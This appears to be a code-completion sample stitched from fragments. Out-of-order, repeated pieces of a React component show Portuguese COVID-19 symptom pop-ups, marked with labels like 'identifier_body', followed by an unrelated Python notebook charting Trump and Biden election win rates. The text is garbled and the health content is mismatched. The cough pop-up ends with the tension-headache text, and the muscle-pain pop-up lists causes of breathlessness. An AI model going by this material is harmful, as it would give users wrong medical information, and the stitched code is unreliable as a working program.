muitas atividades / organizações. A cefaleia tensional episódica
geralmente acontece por uma situação estressante isolada ou um acúmulo
de estresse. Estar exposto ao estresse diariamente pode levar à cefaleia
tensional crônica.
</p>
</Modal.Body>
<Modal.Footer>
<Button onClick={props.onHide}>Close</Button>
</Modal.Footer>
</Modal>
);
function AppTo() {
const [modalShow, setModalShow] = React.useState(false);
return (
<>
<button onClick={() => setModalShow(true)} className="icons__symptoms">
Tosse
</button>
<Tow show={modalShow} onHide={() => setModalShow(false)} />
</>
);
}
//terceiro
const Three = (props) => (
<Modal
{...props}
size="lg"
aria-labelledby="contained-modal-title-vcenter"
centered
>
<Modal.Header closeButton>
<Modal.Title id="contained-modal-title-vcenter" className="text-dark">
Entenda!
</Modal.Title>
</Modal.Header>
<Modal.Body>
<h4 className="text-dark my-2">O que é Febre?</h4>
<p className="text-dark">
A febre é um dos sinais clínicos mais comuns no ser humano e se
caracteriza por uma elevação acima da média da temperatura corporal. A
febre é tão comum que a maioria de nós nunca parou para pensar no seu
real significado. PUBLICIDADE Geralmente associada à infecção, a febre
também pode ocorrer em diversas outras situações, como em caso de
tumores, doenças autoimunes, reação a medicamentos, etc. O corpo humano
apresenta uma temperatura normal entre 36 e 37,5ºC. Ela sofre alterações
ao longo do dia, estando mais próxima de 36ºC durante a madrugada e mais
para 37,5ºC no final da tarde. Esta variação é chamada de ciclo
circadiano da temperatura corporal. Uma temperatura de 37,5ºC no início
da manhã tem muito mais relevância do que esta mesma temperatura no
final do dia. Algumas pessoas têm naturalmente temperaturas um pouco
mais elevadas que outras, podendo apresentar algo em torno de 37,5ºC ao
final do dia sem que isso tenha qualquer significado clínico. Por outro
lado, há aqueles que possuem temperatura basal mais baixa, às vezes
próximo de 35,5ºC. Nestes, uma temperatura de 37,5ºC é algo bem acima do
seu normal. Portanto, antes de se diagnosticar uma febre, é importante
saber qual a temperatura habitual do paciente. Consideramos febre a
elevação da temperatura corporal acima da média do paciente. Como muitas
vezes não temos um histórico da variação habitual da temperatura de cada
indivíduo, usamos os valores médios encontrados em estudos para definir
os limites de temperatura que indicam febre. É importante termos em
mente também que o modo como medirmos a temperatura corporal pode
fornecer resultados diferentes. Quanto mais próximo do centro do corpo,
maior será a temperatura.
</p>
<Image src={Nurse} className="nurse__img" />
<h6 className="text-dark mt-5">
Quais são as principais causas de febre?
</h6>
<p className="text-dark">
As causas mais comuns de febre são as infecções. Doenças como pneumonia,
meningite, pielonefrite e endocardite (infecção das válvulas do coração)
costumam vir acompanhadas de febre alta e debilidade física. Gripe, ao
contrário do resfriado, também pode ser causa de febre alta (leia:
Diferenças entre gripe e resfriado). Quadros de febre prolongada,
normalmente por volta dos 38ºC, às vezes intermitentes ou somente
noturna, associada à perda de peso, em geral indicam infecções como
tuberculose ou AIDS. Câncer, leucemia e linfoma podem causar febre baixa
ou febrículas prolongadas. Doenças autoimunes, como lúpus, artrite
reumatoide também causam febre. Vários medicamentos podem causar febre,
incluindo antibióticos e anti-inflamatórios, por mais paradoxal que isso
possa parecer. Normalmente são reações individuais aos componentes da
droga, em um processo semelhante a uma alergia. Algumas causas menos
comuns de febre incluem:
<ul>
<li>Hipertireoidismo.</li>
<li>Excesso de exposição solar.</li>
<li>Cirurgias.</li>
<li> Traumas.</li>
<li>Feocromocitoma.</li>
<li>Embolia pulmonar.</li>
<li>Desidratação.</li>
<li>AVC (com lesão do hipotálamo).</li>
<li>Hepatite por álcool.</li>
</ul>
</p>
</Modal.Body>
<Modal.Footer>
<Button onClick={props.onHide}>Close</Button>
</Modal.Footer>
</Modal>
);
function AppFe() {
const [modalShow, setModalShow] = React.useState(false);
return (
<>
<button onClick={() => setModalShow(true)} className="icons__symptoms">
Febre
</button>
<Three show={modalShow} onHide={() | className="text-dark">
Entenda!
</Modal.Title>
</Modal.Header>
<Modal.Body>
<h4 className="text-dark my-2">O que é Dispneia?</h4>
<p className="text-dark">
Dispneia é a sensação de falta de ar, dificuldade de respirar ou
respiração incompleta. Geralmente essa sensação é originada por doenças
cardíacas e/ou pulmonares, mas pode ser causada por diversas outras
condições. A dispneia pode ser classificada em aguda, crônica, dispneia
de esforço, de repouso e suspirosa.
</p>
<Image src={Nurse} className="nurse__img" />
<h6 className="text-dark mt-5">Causas de dispneia</h6>
<ul className="text-dark">
<li>
Baixa concentração de oxigênio no ar, como em grandes altitudes;
</li>
<li>Obstrução das vias aéreas;</li>
<li>Doença cardíaca;</li>
<li> Problemas no pulmão;</li>
<li>Doenças neurológicas;</li>
<li>Medicamentos;</li>
<li>
Entre outras que levam a incapacidade do sangue carrear o oxigênio
pelo corpo, como na anemia grave, sangramentos e doenças
hematológicas.
</li>
</ul>
</Modal.Body>
<Modal.Footer>
<Button onClick={props.onHide}>Close</Button>
</Modal.Footer>
</Modal>
);
function AppDi() {
const [modalShow, setModalShow] = React.useState(false);
return (
<>
<button onClick={() => setModalShow(true)} className="icons__symptoms">
Dispneia
</button>
<Four show={modalShow} onHide={() => setModalShow(false)} />
</>
);
}
//quinta
const Five = (props) => (
<Modal
{...props}
size="lg"
aria-labelledby="contained-modal-title-vcenter"
centered
>
<Modal.Header closeButton>
<Modal.Title id="contained-modal-title-vcenter" className="text-dark">
Entenda!
</Modal.Title>
</Modal.Header>
<Modal.Body className="text-dark">
<h4 className="my-2">O que é Dor muscular?</h4>
<p className="">
A dor muscular (CID 10 M79. 1) é comum e pode envolver mais de um
músculo. Ela pode, também, envolver ligamentos, tendões e fáscias, os
tecidos moles que conectam os músculos e ossos. Pode acontecer em muitas
partes do corpo como perna, coxa, ombro, costas, pescoço, entre outros.
</p>
<Image src={Nurse} className="nurse__img" />
<h6 className="mt-5">Causas</h6>
<p>
A dor muscular está mais frequentemente relacionada a tensão, uso
excessivo ou lesão muscular por exercício ou trabalho fisicamente
desgastante. Nessas situações, a dor tende a envolver músculos
específicos e começa durante ou logo após a atividade. Em geral a
atividade que está causando a dor muscular é óbvia. Porém, muitas vezes
o exercício ou postura que a desencadeiam é difícil de ser de ser
reconhecido. A dor muscular também pode ser um sinal de condições que
afetam todo seu corpo, como algumas infecções (incluindo a gripe). Uma
causa comum que muitas vezes é confundida com dor muscular é a
fibromialgia, uma condição que modifica o sistema que reconhece a dor
causando dores muitas vezes generalizadas, distúrbio do sono, fadiga e
dor de cabeça. Mas inúmeras causas podem levar à dor muscular. Veja
algumas:
</p>
<ul className="">
<li>
Baixa concentração de oxigênio no ar, como em grandes altitudes;
</li>
<li>Obstrução das vias aéreas;</li>
<li>Doença cardíaca;</li>
<li> Problemas no pulmão;</li>
<li>Doenças neurológicas;</li>
<li>Medicamentos;</li>
<li>
Entre outras que levam a incapacidade do sangue carrear o oxigênio
pelo corpo, como na anemia grave, sangramentos e doenças
hematológicas.
</li>
</ul>
</Modal.Body>
<Modal.Footer>
<Button onClick={props.onHide}>Close</Button>
</Modal.Footer>
</Modal>
);
function AppMu() {
const [modalShow, setModalShow] = React.useState(false);
return (
<>
<button onClick={() => setModalShow(true)} className="icons__symptoms">
Dor Muscular
</button>
<Five show={modalShow} onHide={() => setModalShow(false)} />
</>
);
}
//sexta
const Six = (props) => (
<Modal
{...props}
size="lg"
aria-labelledby="contained-modal-title-vcenter"
centered
>
<Modal.Header closeButton>
<Modal.Title id="contained-modal-title-vcenter" className="text-dark">
Entenda!
</Modal.Title>
</Modal.Header>
<Modal.Body className="text-dark">
<h4 className="my-2">O que é Dor no Peito?</h4>
<p className="">
Dor no peito (CID 10 - R07) é o desconforto ou dor que uma pessoa sente
na parte frontal do corpo, geralmente abaixo do pescoço e acima do
abdômen superior. Nem sempre é sintoma de infarto, podendo ser sintoma
de outras doenças e condições. Além disso, pode vir acompanhado de falta
de ar, tontura, entre outros. A dor no peito pode atingir diferentes
intensidades e migrar para outras partes do corpo, como as costas, o
pescoço e ambos os braços. Os sintomas da dor no peito variam de acordo
com a causa da dor. Majoritariamente, a dor no peito é relacionada a
algum problema no coração. Nesses casos, os sintomas mais comuns são:
</p>
<ul>
<li>Sensação de aperto no coração</li>
<li>
Dor que se espalha pelo corpo, em regiões como costas, pescoço, nuca,
ombros e braços (especialmente o esquerdo)
</li>
<li>
Dor recorrente, que dura por alguns minutos, desaparece e retorna,
variando sempre de intensidade
</li>
<li>Pode vir junto com falta de ar, tontura, náusea e sudorese.</li>
</ul>
<h6>Alguns sintomas sugerem ser não cardíacos, como:</h6>
<ul>
<li>Gosto amargo na boca</li>
<li>Dificuldade de deglutição</li>
<li>Dor que varia de intensidade conforme você muda de posição</li>
<li>Dor que se agrava quando você respira fundo ou tosse</li>
<li>Sensibilidade na região do peito.</li>
</ul>
<Image src={Nurse} className="nurse__img" />
<h6 className="mt-5">Causas</h6>
<p>
Existem diversas causas possíveis para a dor no peito. Ela também pode
estar diretamente relacionada a alguns órgãos.
</p>
<p>Causas ligadas ao coração:</p>
<ul className="">
<li>Infarto </li>
<li>Angina</li>
<li>Dissecção aórtica</li>
<li>Pericardite.</li>
</ul>
</Modal.Body>
<Modal.Footer>
<Button onClick={props.onHide}>Close</Button>
</Modal.Footer>
</Modal>
);
function AppPe() {
const [modalShow, setModalShow] = React.useState(false);
return (
<>
<button onClick={() => setModalShow(true)} className="icons__symptoms">
Dor no Peito
</button>
<Six show={modalShow} onHide={() => setModalShow(false)} />
</>
);
}
export default Symptoms;
| => setModalShow(false)} />
</>
);
}
//quarta
const Four = (props) => (
<Modal
{...props}
size="lg"
aria-labelledby="contained-modal-title-vcenter"
centered
>
<Modal.Header closeButton>
<Modal.Title id="contained-modal-title-vcenter" | identifier_body |
symptoms.js | import React from "react";
import { Container, Col, Row, Image, Modal, Button } from "react-bootstrap";
import ImgSymptoms from "../assets/sick.png";
import ImgSymptomsCircle from "../assets/Circle.svg";
import "../components/symptoms.scss";
import Nurse from "../assets/nurse.svg";
const Symptoms = () => (
<Container>
<Col className="py-5">
<Col className="text-right m-5">
<h2 className="m-5">Sintomas do COVID-19</h2>
</Col>
<Row className="d-flex align-items-center">
<Col className="text-left" lg={3}>
<section classsName="icons__symptons ">
<AppCe />
</section>
<section classsName="icons__symptons ">
<AppTo />
</section>
<section classsName="icons__symptons ">
<AppFe />
</section>
</Col>
<Col
className="img__symptoms d-flex align-items-center justify-content-center "
lg={6}
>
<Image src={ImgSymptomsCircle} className="img__circle" />
<Image src={ImgSymptoms} />
</Col>
<Col className="text-right" lg={3}>
<section classsName="icons__symptons">
<AppDi />
</section>
<section classsName="icons__symptons">
<AppMu />
</section>
<section classsName="icons__symptons">
<AppPe />
</section>
</Col>
</Row>
</Col>
</Container>
);
//primeiro item
const One = (props) => (
<Modal
{...props}
size="lg"
aria-labelledby="contained-modal-title-vcenter"
centered
>
<Modal.Header closeButton>
<Modal.Title id="contained-modal-title-vcenter" className="text-dark">
Entenda!
</Modal.Title>
</Modal.Header>
<Modal.Body>
<h4 className="text-dark">O que é Cefaleia tensional?</h4>
<p className="text-dark">
A cefaleia tensional é geralmente uma dor difusa, de leve a moderada
intensidade na sua cabeça, muitas vezes descrita como a sensação de uma
faixa apertando o crânio. A cefaleia tensional é o tipo mais comum de
dor de cabeça, e suas causas não são bem compreendidas. De acordo com a
Sociedade Brasileira de Cefaleia, cerca de 38% a 74% dos brasileiros
sofrem com cefaleia tensional.
</p>
<Image src={Nurse} className="nurse__img" />
<h6 className="text-dark">Causas</h6>
<p className="text-dark">
{" "}
Não há uma causa única para dor de cabeça tensional. Este tipo de dor de
cabeça não é uma característica hereditária que ocorre em famílias. Em
algumas pessoas, dores de cabeça de tensão são causados pela contração
involuntária e crônica de músculos na parte de trás do pescoço e do
couro cabeludo. Essa tensão muscular pode ser causada por:
<ul>
<li> Repouso insuficiente </li>
<li> Má postura </li>
<li> Estresse emocional ou mental, incluindo</li>
<li> depressão </li>
<li> Ansiedade </li>
<li> Cansaço </li>
<li> Fome </li>
<li> Excesso de exercícios. </li>
</ul>
Dores de cabeça tensionais são geralmente desencadeadas por algum tipo
de estresse de origem externa ou interna. Exemplos de fatores de
estresse incluem: Ter problemas em casa / vida familiar difícil Estar
esperando um filho ou filha Preparar-se para testes ou exames Voltar de
férias Iniciar um novo trabalho Perder um emprego Estar insatisfeito com
o próprio corpo Prazos no trabalho Competição em esportes ou outras
atividades Ser perfeccionista Não dormir o suficiente Se envolver em
muitas atividades / organizações. A cefaleia tensional episódica
geralmente acontece por uma situação estressante isolada ou um acúmulo
de estresse. Estar exposto ao estresse diariamente pode levar à cefaleia
tensional crônica.
</p>
</Modal.Body>
<Modal.Footer>
<Button onClick={props.onHide}>Close</Button>
</Modal.Footer>
</Modal>
);
function AppCe() {
const [modalShow, setModalShow] = React | tate(false);
return (
<>
<button onClick={() => setModalShow(true)} className="icons__symptoms">
Cefalea
</button>
<One show={modalShow} onHide={() => setModalShow(false)} />
</>
);
}
//segundo item de opção
const Tow = (props) => (
<Modal
{...props}
size="lg"
aria-labelledby="contained-modal-title-vcenter"
centered
>
<Modal.Header closeButton>
<Modal.Title id="contained-modal-title-vcenter" className="text-dark">
Entenda!
</Modal.Title>
</Modal.Header>
<Modal.Body>
<h4 className="text-dark my-2">O que é Tosse?</h4>
<p className="text-dark">
Há dois tipos de tosse: a seca e a produtiva. É a presença ou não de
muco que estabelece a diferença. Na tosse produtiva a secreção se
movimenta e é eliminada; na seca, esse catarro parece não existir. É
importante avaliar se a tosse é realmente seca, ou se a secreção não
flui por desidratação ou tratamento incorreto.
</p>
<Image src={Nurse} className="nurse__img" />
<h6 className="text-dark mt-5">Causas da Tosse</h6>
<p className="text-dark">
O fumo é a principal causa, porque aumenta o volume de muco produzido
pelos brônquios; causa irritação física e química das mucosas; destrói
os cílios que cobrem o revestimento interno dos brônquios; facilita o
acúmulo de material estranho às vias aéreas. Outras causas importantes
são a sinusite, principalmente em crianças, a síndrome do gotejamento
pós-nasal, a asma, o refluxo gastroesofágico, infecções respiratórias,
bronquite crônica e medicamentos para controle da hipertensão.
<h6 className="my-4">RECOMENDAÇÕES EM CASO DE TOSSE</h6>
<ul>
<li>
{" "}
Beba bastante água. A água é o melhor antitussígeno que se conhece,
pois facilita a movimentação do muco sobre a camada de cílios;{" "}
</li>
<li>
{" "}
Dê preferência aos líquidos quentes, que costumam trazer alívio
sintomático, como os chás de nossas avós: chá com limão e mel, de
camomila, erva cidreira, erva doce, entre outros. Chá-preto e
chá-mate devem ser evitados por causa do alto teor de cafeína;{" "}
</li>
<li>
{" "}
Mantenha a cabeça elevada à noite, usando travesseiros extras ou
levantando a cabeceira da cama com calços;
</li>
<li> Mantenha os ambientes bem ventilados;</li>
<li>
{" "}
Aumente o teor de umidade do ar com umidificadores ou vaporizadores.
Tome banhos quentes prolongados para respirar bastante vapor;
</li>
<li>
{" "}
Não tome remédios por conta própria. Procure assistência médica para
diagnóstico e tratamento.
</li>
</ul>
Dores de cabeça tensionais são geralmente desencadeadas por algum tipo
de estresse de origem externa ou interna. Exemplos de fatores de
estresse incluem: Ter problemas em casa / vida familiar difícil Estar
esperando um filho ou filha Preparar-se para testes ou exames Voltar de
férias Iniciar um novo trabalho Perder um emprego Estar insatisfeito com
o próprio corpo Prazos no trabalho Competição em esportes ou outras
atividades Ser perfeccionista Não dormir o suficiente Se envolver em
muitas atividades / organizações. A cefaleia tensional episódica
geralmente acontece por uma situação estressante isolada ou um acúmulo
de estresse. Estar exposto ao estresse diariamente pode levar à cefaleia
tensional crônica.
</p>
</Modal.Body>
<Modal.Footer>
<Button onClick={props.onHide}>Close</Button>
</Modal.Footer>
</Modal>
);
function AppTo() {
const [modalShow, setModalShow] = React.useState(false);
return (
<>
<button onClick={() => setModalShow(true)} className="icons__symptoms">
Tosse
</button>
<Tow show={modalShow} onHide={() => setModalShow(false)} />
</>
);
}
//terceiro
const Three = (props) => (
<Modal
{...props}
size="lg"
aria-labelledby="contained-modal-title-vcenter"
centered
>
<Modal.Header closeButton>
<Modal.Title id="contained-modal-title-vcenter" className="text-dark">
Entenda!
</Modal.Title>
</Modal.Header>
<Modal.Body>
<h4 className="text-dark my-2">O que é Febre?</h4>
<p className="text-dark">
A febre é um dos sinais clínicos mais comuns no ser humano e se
caracteriza por uma elevação acima da média da temperatura corporal. A
febre é tão comum que a maioria de nós nunca parou para pensar no seu
real significado. PUBLICIDADE Geralmente associada à infecção, a febre
também pode ocorrer em diversas outras situações, como em caso de
tumores, doenças autoimunes, reação a medicamentos, etc. O corpo humano
apresenta uma temperatura normal entre 36 e 37,5ºC. Ela sofre alterações
ao longo do dia, estando mais próxima de 36ºC durante a madrugada e mais
para 37,5ºC no final da tarde. Esta variação é chamada de ciclo
circadiano da temperatura corporal. Uma temperatura de 37,5ºC no início
da manhã tem muito mais relevância do que esta mesma temperatura no
final do dia. Algumas pessoas têm naturalmente temperaturas um pouco
mais elevadas que outras, podendo apresentar algo em torno de 37,5ºC ao
final do dia sem que isso tenha qualquer significado clínico. Por outro
lado, há aqueles que possuem temperatura basal mais baixa, às vezes
próximo de 35,5ºC. Nestes, uma temperatura de 37,5ºC é algo bem acima do
seu normal. Portanto, antes de se diagnosticar uma febre, é importante
saber qual a temperatura habitual do paciente. Consideramos febre a
elevação da temperatura corporal acima da média do paciente. Como muitas
vezes não temos um histórico da variação habitual da temperatura de cada
indivíduo, usamos os valores médios encontrados em estudos para definir
os limites de temperatura que indicam febre. É importante termos em
mente também que o modo como medirmos a temperatura corporal pode
fornecer resultados diferentes. Quanto mais próximo do centro do corpo,
maior será a temperatura.
</p>
<Image src={Nurse} className="nurse__img" />
<h6 className="text-dark mt-5">
Quais são as principais causas de febre?
</h6>
<p className="text-dark">
As causas mais comuns de febre são as infecções. Doenças como pneumonia,
meningite, pielonefrite e endocardite (infecção das válvulas do coração)
costumam vir acompanhadas de febre alta e debilidade física. Gripe, ao
contrário do resfriado, também pode ser causa de febre alta (leia:
Diferenças entre gripe e resfriado). Quadros de febre prolongada,
normalmente por volta dos 38ºC, às vezes intermitentes ou somente
noturna, associada à perda de peso, em geral indicam infecções como
tuberculose ou AIDS. Câncer, leucemia e linfoma podem causar febre baixa
ou febrículas prolongadas. Doenças autoimunes, como lúpus, artrite
reumatoide também causam febre. Vários medicamentos podem causar febre,
incluindo antibióticos e anti-inflamatórios, por mais paradoxal que isso
possa parecer. Normalmente são reações individuais aos componentes da
droga, em um processo semelhante a uma alergia. Algumas causas menos
comuns de febre incluem:
<ul>
<li>Hipertireoidismo.</li>
<li>Excesso de exposição solar.</li>
<li>Cirurgias.</li>
<li> Traumas.</li>
<li>Feocromocitoma.</li>
<li>Embolia pulmonar.</li>
<li>Desidratação.</li>
<li>AVC (com lesão do hipotálamo).</li>
<li>Hepatite por álcool.</li>
</ul>
</p>
</Modal.Body>
<Modal.Footer>
<Button onClick={props.onHide}>Close</Button>
</Modal.Footer>
</Modal>
);
function AppFe() {
const [modalShow, setModalShow] = React.useState(false);
return (
<>
<button onClick={() => setModalShow(true)} className="icons__symptoms">
Febre
</button>
<Three show={modalShow} onHide={() => setModalShow(false)} />
</>
);
}
//quarta
const Four = (props) => (
<Modal
{...props}
size="lg"
aria-labelledby="contained-modal-title-vcenter"
centered
>
<Modal.Header closeButton>
<Modal.Title id="contained-modal-title-vcenter" className="text-dark">
Entenda!
</Modal.Title>
</Modal.Header>
<Modal.Body>
<h4 className="text-dark my-2">O que é Dispneia?</h4>
<p className="text-dark">
Dispneia é a sensação de falta de ar, dificuldade de respirar ou
respiração incompleta. Geralmente essa sensação é originada por doenças
cardíacas e/ou pulmonares, mas pode ser causada por diversas outras
condições. A dispneia pode ser classificada em aguda, crônica, dispneia
de esforço, de repouso e suspirosa.
</p>
<Image src={Nurse} className="nurse__img" />
<h6 className="text-dark mt-5">Causas de dispneia</h6>
<ul className="text-dark">
<li>
Baixa concentração de oxigênio no ar, como em grandes altitudes;
</li>
<li>Obstrução das vias aéreas;</li>
<li>Doença cardíaca;</li>
<li> Problemas no pulmão;</li>
<li>Doenças neurológicas;</li>
<li>Medicamentos;</li>
<li>
Entre outras que levam a incapacidade do sangue carrear o oxigênio
pelo corpo, como na anemia grave, sangramentos e doenças
hematológicas.
</li>
</ul>
</Modal.Body>
<Modal.Footer>
<Button onClick={props.onHide}>Close</Button>
</Modal.Footer>
</Modal>
);
function AppDi() {
const [modalShow, setModalShow] = React.useState(false);
return (
<>
<button onClick={() => setModalShow(true)} className="icons__symptoms">
Dispneia
</button>
<Four show={modalShow} onHide={() => setModalShow(false)} />
</>
);
}
//quinta
const Five = (props) => (
<Modal
{...props}
size="lg"
aria-labelledby="contained-modal-title-vcenter"
centered
>
<Modal.Header closeButton>
<Modal.Title id="contained-modal-title-vcenter" className="text-dark">
Entenda!
</Modal.Title>
</Modal.Header>
<Modal.Body className="text-dark">
<h4 className="my-2">O que é Dor muscular?</h4>
<p className="">
A dor muscular (CID 10 M79. 1) é comum e pode envolver mais de um
músculo. Ela pode, também, envolver ligamentos, tendões e fáscias, os
tecidos moles que conectam os músculos e ossos. Pode acontecer em muitas
partes do corpo como perna, coxa, ombro, costas, pescoço, entre outros.
</p>
<Image src={Nurse} className="nurse__img" />
<h6 className="mt-5">Causas</h6>
<p>
A dor muscular está mais frequentemente relacionada a tensão, uso
excessivo ou lesão muscular por exercício ou trabalho fisicamente
desgastante. Nessas situações, a dor tende a envolver músculos
específicos e começa durante ou logo após a atividade. Em geral a
atividade que está causando a dor muscular é óbvia. Porém, muitas vezes
o exercício ou postura que a desencadeiam é difícil de ser de ser
reconhecido. A dor muscular também pode ser um sinal de condições que
afetam todo seu corpo, como algumas infecções (incluindo a gripe). Uma
causa comum que muitas vezes é confundida com dor muscular é a
fibromialgia, uma condição que modifica o sistema que reconhece a dor
causando dores muitas vezes generalizadas, distúrbio do sono, fadiga e
dor de cabeça. Mas inúmeras causas podem levar à dor muscular. Veja
algumas:
</p>
<ul className="">
<li>
Baixa concentração de oxigênio no ar, como em grandes altitudes;
</li>
<li>Obstrução das vias aéreas;</li>
<li>Doença cardíaca;</li>
<li> Problemas no pulmão;</li>
<li>Doenças neurológicas;</li>
<li>Medicamentos;</li>
<li>
Entre outras que levam a incapacidade do sangue carrear o oxigênio
pelo corpo, como na anemia grave, sangramentos e doenças
hematológicas.
</li>
</ul>
</Modal.Body>
<Modal.Footer>
<Button onClick={props.onHide}>Close</Button>
</Modal.Footer>
</Modal>
);
function AppMu() {
const [modalShow, setModalShow] = React.useState(false);
return (
<>
<button onClick={() => setModalShow(true)} className="icons__symptoms">
Dor Muscular
</button>
<Five show={modalShow} onHide={() => setModalShow(false)} />
</>
);
}
//sexta
const Six = (props) => (
<Modal
{...props}
size="lg"
aria-labelledby="contained-modal-title-vcenter"
centered
>
<Modal.Header closeButton>
<Modal.Title id="contained-modal-title-vcenter" className="text-dark">
Entenda!
</Modal.Title>
</Modal.Header>
<Modal.Body className="text-dark">
<h4 className="my-2">O que é Dor no Peito?</h4>
<p className="">
Dor no peito (CID 10 - R07) é o desconforto ou dor que uma pessoa sente
na parte frontal do corpo, geralmente abaixo do pescoço e acima do
abdômen superior. Nem sempre é sintoma de infarto, podendo ser sintoma
de outras doenças e condições. Além disso, pode vir acompanhado de falta
de ar, tontura, entre outros. A dor no peito pode atingir diferentes
intensidades e migrar para outras partes do corpo, como as costas, o
pescoço e ambos os braços. Os sintomas da dor no peito variam de acordo
com a causa da dor. Majoritariamente, a dor no peito é relacionada a
algum problema no coração. Nesses casos, os sintomas mais comuns são:
</p>
<ul>
<li>Sensação de aperto no coração</li>
<li>
Dor que se espalha pelo corpo, em regiões como costas, pescoço, nuca,
ombros e braços (especialmente o esquerdo)
</li>
<li>
Dor recorrente, que dura por alguns minutos, desaparece e retorna,
variando sempre de intensidade
</li>
<li>Pode vir junto com falta de ar, tontura, náusea e sudorese.</li>
</ul>
<h6>Alguns sintomas sugerem ser não cardíacos, como:</h6>
<ul>
<li>Gosto amargo na boca</li>
<li>Dificuldade de deglutição</li>
<li>Dor que varia de intensidade conforme você muda de posição</li>
<li>Dor que se agrava quando você respira fundo ou tosse</li>
<li>Sensibilidade na região do peito.</li>
</ul>
<Image src={Nurse} className="nurse__img" />
<h6 className="mt-5">Causas</h6>
<p>
Existem diversas causas possíveis para a dor no peito. Ela também pode
estar diretamente relacionada a alguns órgãos.
</p>
<p>Causas ligadas ao coração:</p>
<ul className="">
<li>Infarto </li>
<li>Angina</li>
<li>Dissecção aórtica</li>
<li>Pericardite.</li>
</ul>
</Modal.Body>
<Modal.Footer>
<Button onClick={props.onHide}>Close</Button>
</Modal.Footer>
</Modal>
);
function AppPe() {
const [modalShow, setModalShow] = React.useState(false);
return (
<>
<button onClick={() => setModalShow(true)} className="icons__symptoms">
Dor no Peito
</button>
<Six show={modalShow} onHide={() => setModalShow(false)} />
</>
);
}
export default Symptoms;
| .useS | identifier_name |
Data visualization_Trump Winning Rate.py | #!/usr/bin/env python
# coding: utf-8
# # Data Visualization: Trump's Winning Rate
# This report provides detailed facts about Trump's Winning Rate and its correlation between economics indicators, both at national level and at state level
# In[5]:
import pandas as pd
import datetime
import time
import matplotlib.pyplot as plt
import matplotlib.dates as dt
import matplotlib.ticker as ticker
import matplotlib.dates as mdates
from matplotlib.dates import DateFormatter
from matplotlib import cm
import numpy as np
import math
# ## 1. Trump vs. Biden Winning Rate by Time
# In[6]:
pnt = pd.read_csv('presidential_national_toplines_2020.csv')
pnt['date'] = pnt['modeldate'].apply(lambda x: datetime.datetime(int(x.split('/')[2]),int(x.split('/')[0]),int(x.split('/')[1])))
date = pnt['date']
y1 = pnt['ecwin_inc']
y2 = pnt['ecwin_chal']
pnt_win=pd.DataFrame({'date': date, 'Trump': y1, 'Biden': y2})
# In[7]:
import seaborn as sns
fig, ax = plt.subplots(figsize=(14, 4))
df = pnt_win
y = [df['Trump'].tolist(),df['Biden']-df['Trump']]
pal = sns.color_palette("Set1")
ax.stackplot(df['date'], y ,labels=['Trump','Biden'], colors=pal, alpha=0.4 )
ax.legend(loc='upper left')
date_form = DateFormatter("%m-%d")
ax.xaxis.set_major_formatter(date_form)
ax.xaxis.set_major_locator(mdates.WeekdayLocator(interval=1))
plt.show()
# In[8]:
fig, ax = plt.subplots(figsize=(14, 4))
df = pnt_win
# Add x-axis and y-axis
ax.plot(df['date'],df['Trump'], color='red', label = 'Trump Winning Rate')
ax.plot(df['date'],df['Biden'],color='darkblue', label = 'Biden Winning Rate', linestyle='dashed')
# Set title and labels for axes
ax.set(xlabel="date",
ylabel="Winning rate of the election 2020",
title="Trump vs. Biden")
# Define the date format
date_form = DateFormatter("%m-%d")
ax.xaxis.set_major_formatter(date_form)
# Ensure a major tick for each week using (interval=1)
ax.xaxis.set_major_locator(mdates.WeekdayLocator(interval=1))
plt.legend()
plt.show()
# * Trump's winning rate has a declining trend and the winning rate gap between Biden and Trump is enlarging since the beginning of September
# ## 2. Trump's Winning Rate Changes over Time
# In[9]:
pnt_diff = pnt_win.set_index('date').sort_values(by='date').diff().dropna().reset_index()
# In[10]:
fig, ax = plt.subplots(figsize=(14, 4))
df = pnt_diff
# Add x-axis and y-axis
ax.scatter(df['date'],df['Trump'],c= df['Trump'].apply(lambda x: math.floor(-10000*x)))
ax.plot(df['date'], df['Trump'],color='grey')
ax.plot(df['date'],[0]*132,color='lightblue')
# Set title and labels for axes
ax.set(xlabel="date", ylabel="Daily changes in winning rate",title="Variation in winning rate: Trump")
# Define the date format
date_form = DateFormatter("%m-%d")
ax.xaxis.set_major_formatter(date_form)
# Ensure a major tick for each week using (interval=1)
ax.xaxis.set_major_locator(mdates.WeekdayLocator(interval=1))
plt.show()
# * Trump's winning rate fluctuate a lot from June to August: There are large jumps and drops.
# * However, since the beginning of September, the fluctuation is smaller and the winning rate drops for most of the times.
# ## 3. Trump's Winning Rate at State Level
# In[11]:
us_state_abbrev = {'Alabama': 'AL', 'Alaska': 'AK','American Samoa': 'AS','Arizona': 'AZ', 'Arkansas': 'AR',
'California': 'CA','Colorado': 'CO','Connecticut': 'CT', 'Delaware': 'DE','District of Columbia': 'DC','Florida': 'FL',
'Georgia': 'GA','Guam': 'GU','Hawaii': 'HI','Idaho': 'ID','Illinois': 'IL','Indiana': 'IN','Iowa': 'IA','Kansas': 'KS','Kentucky': 'KY','Louisiana': 'LA',
'Maine': 'ME','Maryland': 'MD','Massachusetts': 'MA','Michigan': 'MI','Minnesota': 'MN','Mississippi': 'MS','Missouri': 'MO',
'Montana': 'MT','Nebraska': 'NE','Nevada': 'NV','New Hampshire': 'NH','New Jersey': 'NJ','New Mexico': 'NM','New York': 'NY',
'North Carolina': 'NC','North Dakota': 'ND','Northern Mariana Islands':'MP','Ohio': 'OH','Oklahoma': 'OK','Oregon': 'OR','Pennsylvania': 'PA',
'Puerto Rico': 'PR','Rhode Island': 'RI','South Carolina': 'SC','South Dakota': 'SD', 'Tennessee': 'TN','Texas': 'TX','Utah': 'UT','Vermont': 'VT','Virgin Islands': 'VI','Virginia': 'VA',
'Washington': 'WA','West Virginia': 'WV','Wisconsin': 'WI', 'Wyoming': 'WY'
}
# In[12]:
pst = pd.read_csv('presidential_state_toplines_2020.csv')
pst['date'] = pst['modeldate'].apply(lambda x:datetime.datetime(int(x.split('/')[2]),int(x.split('/')[0]),int(x.split('/')[1])))
pst['code'] = pst['state'].apply(lambda x: 'no' if '-' in x else us_state_abbrev[x])
pst = pst[pst['code']!='no']
# ### 3.1 Winning Rate by State-Month
# In[14]:
import plotly.graph_objects as go
pst_cat = pst[['date','winstate_inc','code']]
datevar = pst_cat['date'].drop_duplicates()[0:-1:30]
for date in datevar:
pst_sub = pst_cat[pst_cat['date'] == date]
fig = go.Figure(data=go.Choropleth(
locations=pst_sub['code'], # Spatial coordinates
z = pst_sub['winstate_inc'].astype(float), # Data to be color-coded
locationmode = 'USA-states', # set of locations match entries in `locations`
